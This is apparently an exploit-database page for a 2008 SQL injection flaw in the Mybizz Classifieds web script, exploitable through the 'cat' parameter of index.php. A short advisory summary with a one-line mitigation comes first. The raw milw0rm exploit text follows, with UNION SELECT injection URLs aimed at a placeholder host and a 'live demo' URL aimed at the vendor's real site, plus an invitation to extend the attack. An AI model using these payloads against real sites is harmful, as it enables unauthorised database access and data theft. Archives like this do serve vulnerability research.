Mybizz Classifieds

vendor:

Mybizz Classifieds

by:

HaCker_Egy

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mybizz Classifieds

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'cat' parameter to '/mybizz/index.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to disclose sensitive information, modify data, compromise the system, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

##################################################
################   Mybizz Classifieds     ##################
## HaCker_Egy
## Contact : hacker_egy@hotmail.com
## Home : pal-hacker.com & atsdp.com
===============================================
# Script :  mybizz classifieds
# Download : http://www.mybizz-classifieds.com/
===============================================
# Exploit :
           ==>> http://www.target.com/mybizz/index.php?cat=-1+union+select+user(),2,3/*
         
     ==>> http://www.target.com/mybizz/index.php?cat=-1+union+select+current_time,2,3/*
    
# live Demo :
             
    ==>> http://www.mybizz-classifieds.com/mybizz/index.php?cat=-1+union+select+user(),2,3/*
   
## Note : use your mind to get Full exploit D: 
   
===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , Mohamed el arab , stack
================================================================================================

# milw0rm.com [2008-06-18]